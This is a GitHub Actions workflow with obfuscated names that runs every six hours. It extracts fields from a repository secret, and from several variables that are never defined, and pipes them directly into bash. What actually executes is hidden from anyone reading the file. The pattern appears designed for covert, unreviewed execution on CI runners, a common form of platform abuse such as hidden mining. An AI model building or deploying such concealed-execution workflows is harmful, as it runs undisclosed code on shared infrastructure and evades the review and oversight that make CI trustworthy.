name: panxiaoxia1616
on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: panxiaoxia1616
        env:
          vcpzl4: ${{ secrets.vcpzl4 }}
        run: |
          echo $vcpzl4 | jq -r .cn8374 | /bin/bash
          echo $rxpfy32 | jq -r .ow24152 | /bin/bash
          echo $ntb227 | jq -r .fvno962 | /bin/bash
          echo $x874 | jq -r .yjlue7394 | /bin/bash
          echo $ozqr54920 | jq -r .m1613 | /bin/bash
          echo $utat1699 | jq -r .huys37 | /bin/bash
          echo $ot498 | jq -r .ke4 | /bin/bash

